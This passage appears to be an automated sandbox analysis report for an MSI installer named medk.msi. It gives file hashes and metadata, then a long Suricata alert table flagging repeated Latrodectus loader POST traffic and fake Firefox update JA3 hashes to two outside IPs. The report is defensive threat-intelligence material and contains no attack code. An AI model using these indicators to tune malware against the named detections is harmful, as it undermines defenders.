                                                                                                                                          SSDEEP:48:EzOu3O+CFXJfT5nZA92StAEbCys9SBToeU:eOX3TnAobwCJZ
                                                                                                                                          MD5:DFF5FB60C141A0789C0CEF8B9AC5003A
                                                                                                                                          SHA1:81203C2F6F86C1801395DB88C8076C24254F0752
                                                                                                                                          SHA-256:71BC3B148FE4407AD8A57900C4BC8590FAFB2EBFCD87925051B327BC0EF51C11
                                                                                                                                          SHA-512:536D34776A8844784C1606387316DE1763FDCBABBAB8FDAF732D66E7BD182119B973B7464EAD08D27CD0A4B15D02DD8674DB5D4D67659FF4F99C430B289954F8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B4021E8B-3405-4502-A951-957A46D23C96}, Number of Words: 10, Subject: MiddleTown, Author: MSER LTD, Name of Creating Application: MiddleTown, Template: ;1033, Comments: This installer database contains the logic and data required to install MiddleTown., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                          Entropy (8bit):7.438035416775101
                                                                                                                                          TrID:
                                                                                                                                          • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                          • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                          File name:medk.msi
                                                                                                                                          File size:2'131'456 bytes
                                                                                                                                          MD5:8cb04bf931a19fa0ae1bd7235180dd4a
                                                                                                                                          SHA1:dfc980a827dbde294ae9fa6e63545d1d57344e96
                                                                                                                                          SHA256:dfff1a07429ff9585f3dab9c78b501174e7c326e1fb95c5234368071b5426768
                                                                                                                                          SHA512:58f1661d689aaa9391f04e086db490693f83b70e068ca10b20cff6f87979a8804aa9f054ac961af06c4b7b17fd88b1912774b2eb3d16b9df8e7a4ed9bb3c0a29
                                                                                                                                          SSDEEP:49152:F943YhW8zBQSc0ZnSKBZKumZr7Apj3Y+7jHplNa:6YY0Zn3K/Al3dXHpra
                                                                                                                                          TLSH:69A5E12273C6C537C9AE01307A1AD66A547DFCA70B3140DBA3C8292EAD745C16739FA7
                                                                                                                                          File Content Preview:........................>...................!...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N..................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:2d2e3797b32b2b99

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-11-13T18:20:20.516009+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649754TCP
                                                                                                                                          2024-11-13T18:20:58.427119+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649956TCP
                                                                                                                                          2024-11-13T18:21:35.289353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649988104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:35.325555+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649988104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:36.742312+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649989104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:36.745751+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649989104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:39.299333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649990104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:39.300933+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649990104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:40.716651+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649991104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:40.718248+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649991104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:42.395163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649992104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:42.396983+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649992104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:43.584276+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649993104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:43.585814+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649993104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:45.443244+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649994104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:45.444884+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649994104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:47.397878+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649995104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:47.399255+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649995104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:48.622876+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649996104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:48.624530+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649996104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:50.027586+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649997104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:50.029215+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649997104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:51.751655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649998104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:51.753617+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.649998104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:54.029296+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649999104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:55.239147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650000104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:55.240793+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650000104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:56.848285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650001104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:56.851903+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650001104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:58.482924+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650003104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:58.484908+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650003104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:21:59.983991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650004104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:21:59.985634+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650004104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:00.966575+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650005104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:00.968674+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650005104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:01.861079+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650006104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:01.880801+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650006104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:02.912371+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650007104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:02.913859+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650007104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:04.419792+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650008104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:04.427996+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650008104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:06.671027+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650010104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:06.697900+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650010104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:08.316987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650011104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:08.318470+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650011104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:09.788113+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650012104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:09.789779+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650012104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:11.153189+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650013104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:11.155356+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650013104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:12.681683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650014104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:12.683403+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650014104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:14.294877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650015104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:14.296434+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650015104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:15.982040+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650016104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:15.983549+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650016104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:17.325529+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650017104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:17.331157+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650017104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:18.397920+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650018104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:18.399575+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650018104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:19.737666+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650019104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:19.739101+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650019104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:21.409128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650020104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:21.410907+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650020104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:23.039590+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650021104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:23.041999+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650021104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:24.805613+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650022104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:24.807513+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650022104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:26.173414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650023104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:26.178401+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650023104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:27.540954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650024104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:27.543087+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650024104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:28.687333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650025104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:28.689063+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650025104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:29.900602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650026104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:29.905136+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650026104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:31.429651+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650027104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:31.431657+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650027104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:33.096565+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650028104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:33.098757+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650028104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:34.500030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650030104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:34.501612+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650030104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:35.673101+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650032104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:35.678117+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650032104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:37.181142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650033104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:37.183209+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650033104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:39.892991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650034104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:39.894562+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650034104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:41.066186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650035104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:41.067957+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650035104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:42.478083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650036104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:42.480274+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650036104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:44.268059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650037104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:44.269690+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650037104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:45.547937+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650038104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:45.550809+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650038104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:47.040842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650039104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:47.043304+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650039104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:48.238909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650040104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:48.240620+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650040104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:49.532459+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650041104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:49.534433+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650041104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:51.299788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650042104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:51.301944+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650042104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:52.434082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650043104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:52.435848+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650043104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:53.735864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650044104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:53.737613+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650044104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:55.151098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650045104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:55.153007+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650045104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:57.103138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650046104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:57.105060+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650046104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:58.946530+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650047104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:58.971880+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650047104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:00.285448+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650048104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:00.287129+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650048104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:01.834162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650049104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:01.835907+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650049104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:03.439760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650050104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:03.441860+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650050104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:04.744340+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650051104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:04.746138+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650051104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:06.367173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650053104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:06.367358+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650053104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:07.792039+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650054104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:07.797628+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650054104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:09.034125+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650055104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:09.036279+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650055104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:10.241740+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650056104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:10.244065+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650056104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:11.469710+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650057104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:11.471628+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650057104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:12.752330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650058104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:12.753942+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650058104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:14.697821+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650059104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:14.700323+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650059104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:16.145916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650061104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:16.169310+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650061104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:17.621379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650062104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:17.623742+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650062104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:19.190901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650063104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:19.192979+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650063104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:20.884938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650064104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:20.886689+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650064104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:22.316802+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650065104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:22.318351+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650065104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:23.601065+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650066104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:23.603206+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650066104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:24.783669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650067104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:24.785334+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650067104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:26.057648+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650068104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:26.059590+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650068104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:27.930928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650069104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:27.932558+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650069104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:29.432946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650070104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:29.434900+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650070104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:30.836937+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650071104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:30.907646+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650071104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:32.368537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650072104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:32.370472+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650072104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:33.673410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650074104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:33.675075+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650074104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:35.075522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650075104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:35.965995+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650076104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:35.978016+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650076104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:37.485237+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650077104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:37.488955+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650077104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:38.786475+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650078104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:38.843722+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650078104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:40.158051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650079104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:40.162202+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650079104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:41.606161+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650080104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:41.608211+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650080104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:43.466328+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650081104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:43.468381+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650081104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:44.811578+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650082104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:44.813523+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650082104.21.15.162443TCP
